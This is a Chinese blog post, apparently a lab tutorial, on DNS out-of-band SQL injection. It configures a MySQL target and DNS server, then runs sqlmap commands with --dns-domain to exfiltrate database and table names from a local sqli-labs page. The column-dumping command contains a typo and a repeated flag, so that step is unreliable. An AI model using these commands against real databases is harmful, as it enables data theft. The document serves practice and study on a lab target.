当前位置:网站首页>DNS外带注入SQLMAP

DNS外带注入SQLMAP

2022-08-11 05:21:00 朵拉爱学习

一.实验环境

1.kali(使用sqlmap)
2.windows10(靶机)
3.windows 2008 R2 ( 需要设置dns服务器)下载镜像地址: https://msdn.itellyou.cn/

设置mysql

secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=""
在这里插入图片描述

在这里插入图片描述

设置dns服务器

在这里插入图片描述
上面服务器这里填kali的ip,下面是主机首选dns服务器填服务器的ip
在这里插入图片描述

kali输入tcpdump -n port 53ping通有数据包就说明成功(如果ping不通服务器的ip的话就关掉防火墙)
在这里插入图片描述
在这里插入图片描述
也填kali的ip

二.SQLMap使用外带dns注入

取库

输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" --dbs

在这里插入图片描述

获取表

kali输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" -D security --tables
在这里插入图片描述

获取到列

输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domaim "hxp1.top" --dbs
在这里插入图片描述

原网站

版权声明
本文为[朵拉爱学习]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_31088019/article/details/126172130

边栏推荐

猜你喜欢

随机推荐